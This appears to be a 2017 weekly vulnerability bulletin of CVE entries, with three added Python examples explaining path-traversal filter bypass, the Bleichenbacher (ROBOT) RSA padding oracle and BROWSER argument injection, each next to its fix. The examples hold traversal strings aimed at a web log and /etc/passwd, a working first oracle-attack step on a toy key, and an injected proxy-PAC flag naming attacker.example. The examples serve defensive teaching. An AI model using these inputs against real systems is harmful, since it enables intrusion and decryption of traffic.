Prior to 4.4.1.10, the Norton Family Android App can be susceptible to an Information Disclosure issue. Information disclosure is a very common issue that attackers will attempt to exploit as a first pass across the application. As they probe the application they will take note of anything that may seem out of place or any bit of information they can use to their advantage such as error messages, system information, user data, version numbers, component names, URL paths, or even simple typos and misspellings. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-15530
BID
CONFIRM
symantec -- norton_family_android_app
Prior to 4.4.1.10, the Norton Family Android App can be susceptible to a Denial of Service (DoS) exploit. A DoS attack is a type of attack whereby the perpetrator attempts to make a particular device unavailable to its intended user by temporarily or indefinitely disrupting services of a specific host within a network. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-15529
BID
CONFIRM
synaptics -- touchpad_drivers
A debug tool in Synaptics TouchPad drivers allows local users with administrative access to obtain sensitive information about keyboard scan codes by modifying registry keys. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17556
HP
CONFIRM
MISC
techno -- portfolio_management_panel
Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request. Published: 2017-12-11. CVSS: not yet calculated. CVE-2017-17110
MISC
techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17695
MISC
techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17696
MISC
techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17694
MISC
techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17693
MISC
telegram -- telegram_messenger
The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak. Published: 2017-12-16. CVSS: not yet calculated. CVE-2017-17715
MISC
tex_live -- tex_live
TeX Live through 20170524 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to linked_scripts/context/stubs/unix/mtxrun, texmf-dist/scripts/context/stubs/mswin/mtxrun.lua, and texmf-dist/tex/luatex/lualibs/lualibs-os.lua. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17513
MISC
tibbr -- tibbr_community_and_tibbr_enterprise
The tibbr web server components of tibbr Community and tibbr Enterprise contain SAML protocol handling errors which may allow authorized users to impersonate other users, and therefore escalate their access privileges. Affected releases are tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-5530
CONFIRM
tibbr -- tibbr_community_and_tibbr_enterprise
The tibbr user profiles components of tibbr Community and tibbr Enterprise expose a weakness in an improperly sandboxed third-party component. Affected releases are TIBCO Software Inc. tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-5534
CONFIRM
tibco -- businessworks_process_monitor
Cross-site scripting (XSS) vulnerability in Integration Matters nJAMS 3, as used in TIBCO BusinessWorks Process Monitor through 3.0.1.3 and other products, allows remote authenticated administrators to inject arbitrary web script or HTML via the users management panel of the web interface. Published: 2017-12-10. CVSS: not yet calculated. CVE-2017-16789
MISC
tidy -- tidy
In Tidy 5.7.0, the prvTidyTidyMetaCharset function in clean.c allows attackers to cause a denial of service (Segmentation Fault), because the currentNode variable in the "children of the head" processing feature is modified in the loop without validating the new value. Published: 2017-12-10. CVSS: not yet calculated. CVE-2017-17497
CONFIRM
tin -- tin
** DISPUTED ** tools/url_handler.pl in TIN 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has reported that this is intentional behavior, because the documentation states "url_handler.pl was designed to work together with tin which only issues shell escaped absolute URLs." Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17520
MISC
tkabber -- tkabber
default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17533
MISC
trend_micro -- encryption_for_mail
A service DLL preloading vulnerability in Trend Micro Encryption for Email versions 5.6 and below could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-11397
MISC
CONFIRM
trend_micro -- scanmail_for_exchange
The Log Query and Quarantine Query pages in Trend Micro ScanMail for Exchange 12.0 are vulnerable to cross site scripting (XSS) attacks. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-14093
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
The absence of Anti-CSRF tokens in Trend Micro ScanMail for Exchange 12.0 web interface forms could allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-14092
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which some communications to the update servers are not encrypted. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-14090
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which certain specific installations that utilize an uncommon feature, Other Update Sources, could be exploited to overwrite sensitive files in the ScanMail for Exchange directory. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-14091
CONFIRM
MISC
vbulletin -- vbulletin
vBulletin through 5.3.x on Windows allows remote PHP code execution because a require_once call is reachable with an unauthenticated request that can include directory traversal sequences to specify an arbitrary pathname, and because ../ traversal is blocked but ..\ traversal is not blocked. For example, an attacker can make an invalid HTTP request containing PHP code, and then make an index.php?routestring= request with enough instances of ".." to reach an Apache HTTP Server log file. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-17671
MISC
vbulletin -- vbulletin
In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cacheTemplates() function, which is a publicly exposed API. This is exploited with the templateidlist parameter to ajax/api/template/cacheTemplates. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-17672
MISC
videolan -- vlc_media_player
In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to an invalid free, because the type of a box may be changed between a read operation and a free operation. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17670
MISC
vmware -- airwatch_console
VMware AirWatch Console (AWC) contains a Broken Access Control vulnerability. Successful exploitation of this issue could result in end-user device details being disclosed to an unauthorized administrator. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-4942
BID
SECTRACK
CONFIRM
vmware -- vasa_provider
Versions of VASA Provider for Clustered Data ONTAP prior to 7.0P1 contain a web server that accepts plain text authentication. This could allow an unauthenticated attacker to obtain authentication credentials. Published: 2017-12-11. CVSS: not yet calculated. CVE-2016-6904
CONFIRM
western_digital -- mycloud_pr4100_2.30.172_devices
An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17560
MISC
MISC
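Three entries in this bulletin are the same defect seen from different sides: the Telegram saveFile entry (a remote peer supplies a pathname instead of a file name), the first vBulletin entry (a filter that strips "../" but not "..\", so the Windows separator walks out of the web root), and the MyCloud upload entry (a writable path with no containment check at all). The added example below is not the code of any of those projects; it shows the described vBulletin-style filter failing under both separator conventions, a containment check that normalises and compares against the base directory, and the basename-only policy that a file-transfer handler should apply. It uses ntpath and posixpath explicitly so the Windows case runs on any host; the base directory and the Apache log path are constructed stand-ins.

```python
import ntpath
import posixpath


def strip_dotdot_slash(user_path):
    """The filter the vBulletin advisory describes: it blocks "../" only, so
    "..\\" passes on Windows, and one pass over the string is easy to fool."""
    return user_path.replace("../", "")


def resolve_under(base, user_path, pathmod=posixpath):
    """Join, normalise, and accept only a result that is still inside base.
    pathmod selects the separator convention (posixpath or ntpath); on a real
    server use os.path and, for existing files, os.path.realpath so symlinks
    are resolved before the comparison."""
    base_norm = pathmod.normpath(base)
    candidate = pathmod.normpath(pathmod.join(base, user_path))
    # Compare with a trailing separator so /srv/app-evil is not taken to be inside /srv/app.
    if candidate != base_norm and not candidate.startswith(base_norm + pathmod.sep):
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def safe_download_name(peer_supplied):
    """For a file-transfer request (the Telegram case) the remote peer may choose
    a file name, never a path: keep the last component under either separator
    convention and refuse names that are empty or special."""
    name = ntpath.basename(peer_supplied)        # ntpath splits on both "\\" and "/"
    if name in ("", ".", ".."):
        raise ValueError(f"invalid file name from peer: {peer_supplied!r}")
    return name


def demo():
    win_base = r"C:\inetpub\vbulletin\core"
    # Constructed: the attacker aims at a web server log they seeded with PHP.
    attack = r"..\..\..\Apache24\logs\access.log"
    after_filter = strip_dotdot_slash(attack)
    escaped_to = ntpath.normpath(ntpath.join(win_base, after_filter))
    try:
        resolve_under(win_base, attack, ntpath)
        win_blocked = False
    except ValueError:
        win_blocked = True
    legit = resolve_under(win_base, "templates/header.php", ntpath)
    # The same filter also fails on POSIX: one pass leaves a fresh "../" behind.
    posix_bypass = strip_dotdot_slash("....//etc/passwd")
    peer_name = safe_download_name("../../tgnet.dat")
    return {"filter_unchanged": after_filter == attack, "escaped_to": escaped_to,
            "win_blocked": win_blocked, "legit": legit,
            "posix_bypass": posix_bypass, "peer_name": peer_name}


if __name__ == "__main__":
    print(demo())
```

The containment check accepts paths by where they end up, not by what characters they contain, which is why it needs no list of bad sequences; for an upload endpoint such as the MyCloud one, combine it with authentication and a fixed destination directory rather than a client-supplied path.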
white_dune -- white_dune
swt/motif/browser.c in White_dune (aka whitedune) 0.30.10 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17518
MISC
wolfssl -- wolfssl
wolfSSL prior to version 3.12.2 provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. The oracle lets an attacker decrypt recorded RSA-key-exchange sessions and perform other private-key operations (such as signing) with the server's key, without obtaining the key itself. This vulnerability is referred to as "ROBOT." Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-13099
CERT-VN
BID
CONFIRM
MISC
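The Radware Alteon and wolfSSL entries are both instances of the Bleichenbacher (ROBOT) oracle: the server reveals, through an alert, timing or connection behaviour, whether an RSA ciphertext decrypts to a PKCS#1 v1.5 block beginning with 00 02. The added example below is mine, not code from either vendor; it builds a toy 128-bit RSA key, models the "weak" oracle the wolfSSL entry names (only the 00 02 prefix is checked), runs the first search step of the attack using only the public key and the oracle, and shows the interval narrowing that the remaining steps repeat until the premaster secret is recovered. Alongside it is the countermeasure TLS specifies: substitute a random premaster secret on any padding failure and continue, so the response no longer depends on the padding. Key size, message and seed are constructed; real keys are 2048 bits and the full attack needs tens of thousands of further queries.

```python
import random


def _is_probable_prime(n, rng, rounds=40):
    """Miller-Rabin; enough for a toy key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand, rng):
            return cand


def make_key(bits, rng):
    """Toy RSA key; k is the modulus length in bytes, as in PKCS#1."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2, rng), _gen_prime(bits // 2, rng)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and phi % e:
            return {"n": n, "e": e, "d": pow(e, -1, phi), "k": bits // 8}


def pkcs1_v15_pad(msg, k, rng):
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))  # non-zero, >= 8 bytes
    return b"\x00\x02" + ps + b"\x00" + msg


def encrypt(key, block):
    return pow(int.from_bytes(block, "big"), key["e"], key["n"])


def decrypt_block(key, c):
    return pow(c, key["d"], key["n"]).to_bytes(key["k"], "big")


def weak_oracle(key, c):
    """The flawed server: an observable difference reveals whether the decrypted
    block begins with 00 02. Nothing else is checked, which is the cheapest
    oracle to exploit."""
    return decrypt_block(key, c)[:2] == b"\x00\x02"


def hardened_unwrap(key, c, pms_len, rng):
    """The TLS countermeasure: on any padding problem substitute a random
    premaster secret and carry on, so the peer sees the same behaviour either
    way and the handshake simply fails later at Finished."""
    block = decrypt_block(key, c)
    fallback = bytes(rng.randrange(256) for _ in range(pms_len))
    sep = block.find(b"\x00", 2)
    ok = block[:2] == b"\x00\x02" and sep >= 10 and len(block) - sep - 1 == pms_len
    return block[sep + 1:] if ok else fallback


def find_first_conforming(n, e, k, oracle, c0):
    """Bleichenbacher step 2a: search s upward from ceil(n / 3B) until
    c0 * s^e decrypts to a conforming block. Needs only the public key."""
    B = 1 << (8 * (k - 2))
    s, queries = -(-n // (3 * B)), 0
    while True:
        queries += 1
        if oracle(c0 * pow(s, e, n) % n):
            return s, queries
        s += 1


def narrow(intervals, s, n, k):
    """Bleichenbacher step 3: a conforming s pins m*s mod n into [2B, 3B),
    which cuts each candidate interval for m down to a few far smaller ones."""
    B = 1 << (8 * (k - 2))
    out = []
    for a, b in intervals:
        for r in range(-(-(a * s - 3 * B + 1) // n), (b * s - 2 * B) // n + 1):
            lo = max(a, -(-(2 * B + r * n) // s))
            hi = min(b, (3 * B - 1 + r * n) // s)
            if lo <= hi:
                out.append((lo, hi))
    return out


def demo(seed=2017):
    rng = random.Random(seed)
    key = make_key(128, rng)                       # toy size; real keys are 2048+ bits
    n, e, k = key["n"], key["e"], key["k"]
    B = 1 << (8 * (k - 2))
    block = pkcs1_v15_pad(b"ok", k, rng)           # 2-byte stand-in premaster secret
    m, c0 = int.from_bytes(block, "big"), encrypt(key, block)

    oracle = lambda c: weak_oracle(key, c)         # all the attacker gets from the server
    s1, queries = find_first_conforming(n, e, k, oracle, c0)
    intervals = narrow([(2 * B, 3 * B - 1)], s1, n, k)
    c_hit, c_miss = c0 * pow(s1, e, n) % n, c0 * pow(s1 - 1, e, n) % n
    return {
        "queries": queries,
        "ground_truth": 2 * B <= (m * s1) % n < 3 * B,   # uses m, which the attacker lacks
        "prev_not": not oracle(c_miss),
        "m_in_intervals": any(lo <= m <= hi for lo, hi in intervals),
        "width_before": B,
        "width_after": sum(hi - lo + 1 for lo, hi in intervals),
        "hardened_lengths": (len(hardened_unwrap(key, c_hit, 2, rng)),
                             len(hardened_unwrap(key, c_miss, 2, rng))),
        "legit_pms": hardened_unwrap(key, c0, 2, rng),
    }


if __name__ == "__main__":
    print(demo())
```

The weak oracle answers differently for c_hit and c_miss; the hardened path returns a premaster secret of the right length for both and still unwraps the genuine ciphertext correctly. In a real implementation the substitution must also be constant-time with respect to the padding check, since a timing difference is an oracle too.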
xen -- xen
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging an incorrect mask for reference-count overflow checking in shadow mode. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17563
CONFIRM
CONFIRM
xen -- xen
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) if shadow mode and log-dirty mode are in place, because of an incorrect assertion related to M2P. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17565
CONFIRM
CONFIRM
xen -- xen
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) or gain host OS privileges in shadow mode by mapping a certain auxiliary page. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17566
CONFIRM
CONFIRM

xen -- xen
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging incorrect error handling for reference counting in shadow mode. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17564
CONFIRM
CONFIRM
xtuple_postbooks -- xtuple_postbooks
guiclient/guiclient.cpp in xTuple PostBooks 4.7.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17525
MISC
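Eleven entries in this bulletin share one bug class, the BROWSER environment-variable argument injection: Python's Lib/webbrowser.py, sensible-browser (which names the --proxy-pac-file vector), Reddit Terminal Viewer, ScummVM, SWI-Prolog, Sylpheed, TeX Live, TIN (disputed), Tkabber, White_dune and xTuple PostBooks. The pattern is the same everywhere: the program splits $BROWSER like a shell would, substitutes the URL for %s (or appends it), and executes the result, so a URL that begins with "-" arrives in the browser's argv as an option. The added example below is mine, not the code of any of those projects; it reproduces that launcher pattern, shows the injected argv for a constructed attacker URL, and adds the validation a hardened launcher needs. The runner argument records argv instead of spawning a process so the example runs without a browser.

```python
import shlex
import subprocess
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def build_argv(browser_env, url):
    """The common launcher pattern: split $BROWSER like a shell would and
    substitute the URL for %s, or append it when there is no placeholder.
    Only $BROWSER is shell-split; the URL becomes one argv element as-is."""
    parts = shlex.split(browser_env)
    if not parts:
        raise ValueError("BROWSER is empty")
    if any("%s" in p for p in parts):
        return [p.replace("%s", url) for p in parts]
    return parts + [url]


def validate_url(url):
    """Reject anything a browser's option parser could read as a flag, and
    anything outside the schemes this launcher is meant to open."""
    if url.startswith("-"):
        raise ValueError(f"refusing URL that looks like an option: {url!r}")
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        raise ValueError(f"unsupported or malformed URL: {url!r}")
    return url


def launch_unsafe(browser_env, url, runner=subprocess.Popen):
    return runner(build_argv(browser_env, url))


def launch_safe(browser_env, url, runner=subprocess.Popen):
    return runner(build_argv(browser_env, validate_url(url)))


def demo():
    record = lambda argv: argv                    # stand-in runner: return argv, spawn nothing
    # Constructed attacker "URL", e.g. a link in untrusted content handed to the launcher.
    injected = "--proxy-pac-file=http://attacker.example/pac.js"
    unsafe_argv = launch_unsafe("chromium", injected, runner=record)
    try:
        launch_safe("chromium", injected, runner=record)
        blocked = False
    except ValueError:
        blocked = True
    legit_argv = launch_safe("firefox -new-tab %s", "https://example.org/page?q=1",
                             runner=record)
    return {"unsafe_argv": unsafe_argv, "blocked": blocked, "legit_argv": legit_argv}


if __name__ == "__main__":
    print(demo())
```

Validation rather than a "--" separator is used because not every browser honours "--" as end-of-options; the injected value is a single argv element, not a shell command, which is why the damage is limited to whatever options the browser accepts (a proxy auto-config file, here). A $BROWSER value that itself wraps the placeholder in a shell, such as sh -c "... %s", turns the same input into full command injection and needs the same validation before substitution.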
yourphpscript.com -- simple_chatting_system
Simple Chatting System 1.0 allows Arbitrary File Upload via view/my_profile.php, which places files under uploads/. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-17593
MISC
zoho -- manageengine_password_manager_pro_9
Zoho ManageEngine Password Manager Pro 9 before 9.4 (9400) has reflected XSS in SearchResult.ec and BulkAccessControlView.ec. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17698
CONFIRM
This product is provided subject to this Notification and this Privacy & Use policy.